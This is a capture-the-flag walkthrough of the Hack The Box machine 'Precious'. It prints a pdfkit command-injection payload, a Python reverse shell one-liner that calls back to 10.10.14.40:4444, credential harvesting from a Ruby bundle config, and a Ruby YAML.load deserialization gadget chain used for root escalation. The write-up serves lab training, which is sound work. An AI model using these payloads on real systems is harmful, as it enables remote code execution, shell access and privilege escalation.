HTB Machine Precious
Port scaning with nmap
port 80 is open : redirect to http://precious.htb/
add this to /etc/hosts
On this page we have Convert Web Page to PDF functionality
after giving url pdf file is downloaded
using exiftool on pdf we know that it is Generated by pdfkit v0.8.6
This version is vulnerable to RCE
Payload:
http://%20`{command}`
we can use this to get reverse shell
http://%20`python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.40",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'`
references: https://www.revshells.com/
we get shell as user ruby
we can see two user in /home directory
user flag is in directory of user henry but it is not accessible.
inside the directory of user ruby there is config file in .bundle in this file we can see password of user henry
we can use this for ssh to henry
user can run /opt/update_dependencies.rb as root with sudo
this file is not writable. looking at code we see it use YAML.load, which is vulnerable to deserialization attack.
we can write in dependencies.yml
payload:
---
- !ruby/object:Gem::Installer
i: x
- !ruby/object:Gem::SpecFetcher
i: y
- !ruby/object:Gem::Requirement
requirements:
!ruby/object:Gem::Package::TarReader
io: &1 !ruby/object:Net::BufferedIO
io: &1 !ruby/object:Gem::Package::TarReader::Entry
read: 0
header: "abc"
debug_output: &1 !ruby/object:Net::WriteAdapter
socket: &1 !ruby/object:Gem::RequestSet
sets: !ruby/object:Net::WriteAdapter
socket: !ruby/module 'Kernel'
method_id: :system
git_set: cat /root/root.txt
method_id: :resolve
reference: https://gist.github.com/staaldraad/89dffe369e1454eedd3306edc8a7e565#file-ruby_yaml_load_sploit2-yaml
now we can run this with sudo and get the root flag sudo /usr/bin/ruby /opt/update_dependencies.rb
This give root flag.
:octocat: Happy Hacking :octocat:
Last updated
Was this helpful?